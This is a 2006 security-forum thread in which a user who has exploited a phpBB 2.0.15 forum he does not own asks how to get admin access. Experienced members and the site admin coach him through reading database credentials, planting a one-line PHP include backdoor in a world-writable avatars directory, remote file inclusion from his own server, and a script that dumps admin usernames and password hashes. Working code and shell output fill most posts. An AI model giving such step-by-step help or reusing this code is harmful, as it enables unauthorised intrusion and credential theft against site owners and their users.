 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
PLEASE HELP, don't know where to post!! :( (phpBB 2015) |
 |
 Posted: Thu Jun 01, 2006 4:01 pm |
 |
|
| utilizator |
| Regular user |
 |
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
 |
|
 |
|
Hello all first,
I'm reading this forum for a month or so trying to get a solution to hack a phpBB 2.0.15 forum...
Finlly found this exploit http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl , figured out Perl allso, and the exploit works, after execution, ls comand works.
So the only thing I found on this forum was to "cat config.php"
so I did, and end up wit:
<?php
2
2
29
// phpBB 2.x auto-generated confi
29
// Do not change anything in this
2
12
$dbms = 'mysql';
2
18
$dbhost = 'localhost';
16
$dbname = 'theforumdbname';
16
$dbuser = 'thedbuser';
18
$dbpasswd = 'thedbpass';
2
1b
$table_prefix = 'phpbb_';
2
22
define('PHPBB_INSTALLED', true);
Ok, so now i have theforumdbname, thedbuser and thedbpass ... and? what to do next?
I see that the sql connection must be from localhost, but i don't have access to the server where the forum is hosted, and i don't know the phpmyadmin login page.
I'm pretty sure that the 'wget' command is disabled or something, because wgeting smth doesent work but "wget --version" does...
So I'm kinda stuck, and didn't find any answers on this forum, neighter on google...
If anyone can help me, I thank you in advance!
PS: Sorry for the poor english... |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 4:20 pm |
|
|
| Chb |
| Valuable expert |
 |
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
First, figure out in which directories you can write. Then write a shell or a script which connects to MySQL and prints you the username+hash.
What does "uname -a" and "id" say? And if it is *BSD you can also try "fetch" instead of "wget". |
|
|
|
|
|
... |
|
| Posted: Thu Jun 01, 2006 4:33 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
1. theforumdbname, thedbuser and thedbpass, I have replaced them on this post, in fact that exploit had shown me the real ones.
2. ls -l get's this:
phpBB2.0.15> ls -l
a
total 385
36
drwxr-xr-x 2 32028 web-user 736 Oct 20 2005 admin
36
drwxr-xr-x 2 32028 web-user 112 Oct 20 2005 cache
3b
-rw-r--r-- 1 32028 web-user 6726 Feb 17 13:17 common.php
3b
-rw-r--r-- 1 32028 web-user 276 May 16 18:09 config.php
33
drwxr-xr-x 3 32028 web-user 320 Feb 21 01:33 db
35
drwxr-xr-x 2 32028 web-user 296 Oct 20 2005 docs
3e
-rw-r--r-- 1 32028 web-user 810 Feb 17 13:17 extension.inc
38
-rw-r--r-- 1 32028 web-user 3643 Feb 17 13:17 faq.php
3c
-rw-r--r-- 1 32028 web-user 45673 Feb 17 13:17 groupcp.php
37
drwxr-xr-x 4 32028 web-user 160 Oct 20 2005 images
39
drwxr-xr-x 2 32028 web-user 976 Oct 20 2005 includes
3a
-rw-r--r-- 1 32028 web-user 14515 Feb 17 13:17 index.php
41
-rw-r--r-- 1 32028 web-user 523 Feb 15 17:47 index_avarie.php
39
drwxr-xr-x 4 32028 web-user 144 Oct 20 2005 language
3a
-rw-r--r-- 1 32028 web-user 7748 Feb 17 13:17 login.php
3f
-rw-r--r-- 1 32028 web-user 12150 Feb 17 13:17 memberlist.php
3a
-rw-r--r-- 1 32028 web-user 37796 Feb 17 13:17 modcp.php
3c
-rw-r--r-- 1 32028 web-user 34445 Feb 17 13:17 posting.php
3c
-rw-r--r-- 1 32028 web-user 72541 Feb 17 13:17 privmsg.php
3c
-rw-r--r-- 1 32028 web-user 3947 Feb 17 13:17 profile.php
3b
-rw-r--r-- 1 32028 web-user 43265 Feb 17 13:17 search.php
3a
drwxr-xr-x 3 32028 web-user 112 Oct 20 2005 templates
3e
-rw-r--r-- 1 32028 web-user 23154 Feb 17 13:17 viewforum.php
3f
-rw-r--r-- 1 32028 web-user 7233 Feb 17 13:17 viewonline.php
3e
-rw-r--r-- 1 32028 web-user 45228 Feb 17 13:17 viewtopic.php
f
phpBB2.0.15>
So you tell me wich one i can write....
uname -a:
9d
Linux web-hosting2.provider 2.6.15-vs2.0.1-gentoo-r5 #1 SMP PREEMPT Wed May 17
11:02:29 EEST 2006 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
f
phpBB2.0.15>
And i have another problem, i forgot about, the cd command doesent work, i can ls though dir's or files withinn dir's.
Any ideea? |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 6:47 pm |
|
|
| Chb |
| Valuable expert |
|
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
I told you to execute "id". With this information you can look, which directories are writable for your user; otherwise look for chmod 777 (google, how to find it... e.g. /images/avatars).
1.: I know.
3.: In almost all linux utilities you can give the absolute path as parameter, so "pwd".  |
|
|
|
|
|
ok... |
|
| Posted: Thu Jun 01, 2006 7:20 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
chmod 777 - no efect what so ever, i think you must be admin-loged in order for that to work
the pwd result:
phpBB2.0.15> pwd
27
/hosting/www/www.domain.com-docs/forum
f
phpBB2.0.15>
the id result:
f
phpBB2.0.15> id
30
uid=81(apache) gid=81(apache) groups=81(apache)
and allso, horray!!! ^^^:
f
phpBB2.0.15> ls images -l
9
total 13
37
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars
!!!
But what now?  |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 8:22 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So you have php scripting level access + shell commands execution possibilities. Now you must write some simple upload php script directly to webserver (example - use 'echo "<php?....blablabla..." >> /hosting/www/www.domain.com-docs/forum/myupload.php' commands). And with upload script just upload whatever you need for next step - like root exploit, written in c language (if gcc is avaliable).
But as it seems to be shared (virtual) hosting, then I don't believe, that you can get that b0x r00ted
Anyway - try "cat /proc/version" - for determine kernel version  |
|
|
|
|
|
hmm... |
|
| Posted: Thu Jun 01, 2006 8:27 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
ok, thanks waraxe for noticeing me... but... i'm posting under the n00b section... you've got me all confused now... where to write the script? and how to upload it... anyway... i just want admin privileges on the forum...
sorry... but if you have some time, please explain more...
sorry again if i'm bothering you... |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 8:37 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
* Sory for the multi-post, but just tryied this:
Obviously the 'avatars' dir within the 'images' one has chmod 777:
phpBB2.0.15> ls images -l
9
total 13
37
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars
39
-rw-r--r-- 1 32028 web-user 169 Oct 20 2005 index.htm
36
drwxr-xr-x 4 32028 web-user 872 Feb 21 01:20 smiles
3a
-rw-r--r-- 1 32028 web-user 807 Oct 20 2005 spacer.gif
f
phpBB2.0.15>
* So I try to upload some text file on the webserver:
f
phpBB2.0.15> wget http://mydomain.com/loghin/l.txt images/avatars/
f
phpBB2.0.15>
* And end up with nothing, 'cat' does nothing:
11
phpBB2.0.15> cat images/avatars/l.txt
f
phpBB2.0.15>
* And the avatars folder is full with jpegs:
f
phpBB2.0.15> ls images/avatars
* I'm doing something wrong? What else is there to do ? |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 9:05 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Ok, i suggest to try to write 1 line long php script to webserver.
Maybe to avatars directory?
This php script contains only one line:
| Code: |
<?php include($r);?>
|
or
| Code: |
<?php include(stripslashes($_GET['r']));?>
|
How to write this script to server?
Try first some simple text file with "echo" command..
Like:
| Code: |
echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt
|
and if it works, you can see text file:
http://www.domain.com/forum/images/avatars/test.txt
In this way you can add text line by line to file!
And finally - when you have that one-line php script working, you can try:
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com
... and hopefully you will see yahoo page ...
This gives you possibility for remote file inclusion. So you can put some bigger php script to your own server and execute it in victim server.
Very simple script for admin password dumping:
| Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
I wrote that and tested within 5 minutes and it works as expected;
Upload this script to your own server, then
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yourownserver.com/myscript.php
and you will see first admin's username and password md5 hash, encountered in database.
Of course, you can write this bigger script right to victim server, passing remote inclusion tricks. It's your choice ...
|
|
|
|
|
|
|
hmm... |
|
| Posted: Thu Jun 01, 2006 9:34 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
ok, so,
| Code: | | echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt |
makes the txt file but it contains the word test written several times, like this:
| Code: | test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test |
never the les, the command:
| Code: | | echo "<?php include(stripslashes($_GET['r']));?>" >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.php |
indeed creates the test.php fille, and after 'cat'-ing the images/avatars/test.php , i see the:
| Code: | | <?php include(stripslashes($_GET['r']));?> |
written several times, and allso
| Code: | | http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com |
doesen't work...
I know this is the right track, but what now? |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 01, 2006 9:43 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Probably "allow_url_fopen=0"
Hmm, so you can try to construct this script:
| Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
line by line.
As you know, "echo bla > x.txt" creates or overwrites file,
but "echo bla >> x.txt" adds one line to file. So you can build script line by line. |
|
|
|
|
|
back... |
|
| Posted: Sat Jun 03, 2006 1:51 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
Sorry, but i had some ISP trouble and no internet connection...
Tryied again to connect to that forum, and worked, but the ls, cat, rm (only ones i've tested) commands doesent work anymore.
So i've echo a test.txt file where i knew was the chmd 777 (images/avatars), and when tryied to display it (http://theadress.com/forum/images/avatars/test.txt) worked!
So tryied this:
| Code: |
f
phpBB2.0.15> echo "<?php" >> /hosting/www/www.site.com-docs/forum/images/avata
rs/test.php
f
phpBB2.0.15> echo "error_reporting(E_ALL);" >> /hosting/www/www.site.com-docs/
forum/images/avatars/test.php
f
phpBB2.0.15> echo "include('config.php');" >> /hosting/www/www.site.com-docs/f
orum/images/avatars/test.php
f
phpBB2.0.15> echo "$h=mysql_connect($dbhost,$dbuser,$dbpasswd);" >> /hosting/www
/www.site.com-docs/forum/images/avatars/test.php
f
phpBB2.0.15> echo "mysql_select_db($dbname,$h);" >> /hosting/www/www.site.com-
docs/forum/images/avatars/test.php
f
phpBB2.0.15> echo "$res=mysql_query("SELECT username,user_password FROM ".$table
_prefix."users WHERE user_level=1",$h);" >> /hosting/www/www.site.com-docs/for
um/images/avatars/test.php
f
phpBB2.0.15> echo "$row=mysql_fetch_row($res);" >> /hosting/www/www.site.com-d
ocs/forum/images/avatars/test.php
f
phpBB2.0.15> echo "$un=$row[0];$pw=$row[1];" >> /hosting/www/www.site.com-docs
/forum/images/avatars/test.php
f
phpBB2.0.15> echo "echo "$un:$pw";" >> /hosting/www/www.site.com-docs/forum/im
ages/avatars/test.php
f
phpBB2.0.15> echo "?> " >> /hosting/www/www.site.com-docs/forum/images/avatars
/test.php
f
phpBB2.0.15> |
but, what do you know? http://theadress.com/forum/images/avatars/test.php doesen't do nothing... 
I don't know what's happened from 2 days ago and why those commands don't work, and I allso don't know what am I doing wrong with the php code...
| Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
Do I need to replace smth in the code? Because I had written it like it is...
Isn't there anything else I can do? Maybe use theforumdbname, thedbuser and thedbpass some how? |
|
|
|
|
|
|
|
|
| Posted: Sat Jun 03, 2006 2:39 pm |
|
|
| Chb |
| Valuable expert |
|
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
Yes, you have to change it.
If you knew, what you have been copying, you would know that "config.php" is included. And where is it? I'm sure, that it isn't in "images/avatars"... So set the path via ".." or use the absolute path. |
|
|
|
|
|
|
|
|
| Posted: Sat Jun 03, 2006 2:49 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
| Chb wrote: | Yes, you have to change it.
If you knew, what you have been copying, you would know that "config.php" is included. And where is it? I'm sure, that it isn't in "images/avatars"... So set the path via ".." or use the absolute path. |
I don't, remember? "Newbies corner"....
So please tell me, I understand that I need to change this line:
| Code: | | include('config.php'); |
withe one of this (?):
| Code: | | include('/hosting/www/www.site.com-docs/forum/config.php'); |
| Code: | | include('http://www.site.com/forum/config.php'); |
?
And if so do I need to include the adress (wich one?) between ?
Thanks all for all the help, and I hope you'll answer me once more... |
|
|
|
|
| Posted: Sat Jun 03, 2006 2:59 pm |
|
|
| utilizator |
| Regular user |
|
|
| Joined: Jun 01, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
ok, replaced one line, | Code: | | include('config.php'); |
with | Code: | | include('http://site.com/forum/config.php'); |
nothing happens eighter... |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 72
Members: 0
Total: 72
